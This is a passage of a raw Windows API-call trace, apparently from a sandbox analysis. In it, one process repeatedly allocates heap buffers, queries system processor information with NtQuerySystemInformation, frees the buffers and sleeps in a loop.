[0220.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.018] Sleep (dwMilliseconds=0x110) [0220.028] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.028] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.039] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.040] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.040] Sleep (dwMilliseconds=0x110) [0220.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.052] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.052] Sleep (dwMilliseconds=0x110) [0220.059] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.059] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.060] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.063] Sleep (dwMilliseconds=0x110) [0220.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.080] Sleep (dwMilliseconds=0x110) [0220.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.096] Sleep (dwMilliseconds=0x110) [0220.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.111] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.112] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.114] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.115] Sleep (dwMilliseconds=0x110) [0220.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.130] Sleep (dwMilliseconds=0x110) [0220.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.165] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.165] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.166] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.166] Sleep (dwMilliseconds=0x110) [0220.196] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.196] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.197] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.197] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.197] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.198] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.198] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.198] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.198] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.199] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.199] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.201] Sleep (dwMilliseconds=0x110) [0220.217] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.217] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.218] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.218] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.218] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.220] Sleep (dwMilliseconds=0x110) [0220.239] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.239] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.240] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.240] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.240] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.240] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.241] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.241] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.241] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.241] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.242] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.242] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.242] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.242] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.242] Sleep (dwMilliseconds=0x110) [0220.247] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.247] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.247] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.247] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.250] Sleep (dwMilliseconds=0x110) [0220.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.264] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.264] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.264] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0220.265] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.265] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.265] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0220.266] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0220.266] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.266] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0220.267] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.267] Sleep (dwMilliseconds=0x110) [0220.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0220.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0220.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0220.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0220.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, 